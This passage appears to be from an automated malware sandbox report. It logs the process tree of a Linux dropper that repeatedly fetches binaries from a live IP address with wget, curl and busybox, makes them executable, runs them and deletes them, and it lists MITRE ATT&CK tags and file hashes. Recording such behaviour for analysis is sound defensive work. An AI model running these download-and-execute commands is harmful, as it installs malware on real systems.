/bin/chmodchmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- File and Directory Permissions Modification
PID:1648
-
-
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Executes dropped EXE
PID:1649
-
-
/bin/rmrm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:1650
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:1651
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Writes file to tmp directory
PID:1652
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:1653
-
-
/bin/chmodchmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- File and Directory Permissions Modification
PID:1654
-
-
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Executes dropped EXE
PID:1655
-
-
/bin/rmrm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:1656
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:1657
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Writes file to tmp directory
PID:1658
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:1659
-
-
/bin/chmodchmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- File and Directory Permissions Modification
PID:1660
-
-
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Executes dropped EXE
PID:1661
-
-
/bin/rmrm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:1662
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:1663
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Writes file to tmp directory
PID:1664
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:1665
-
-
/bin/chmodchmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- File and Directory Permissions Modification
PID:1666
-
-
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Executes dropped EXE
PID:1667
-
-
/bin/rmrm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:1668
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:1669
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Writes file to tmp directory
PID:1670
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:1671
-
-
/bin/chmodchmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- File and Directory Permissions Modification
PID:1672
-
-
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Executes dropped EXE
PID:1673
-
-
/bin/rmrm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:1674
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:1675
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Writes file to tmp directory
PID:1676
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:1677
-
-
/bin/chmodchmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- File and Directory Permissions Modification
PID:1678
-
-
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Executes dropped EXE
PID:1679
-
-
/bin/rmrm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:1680
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97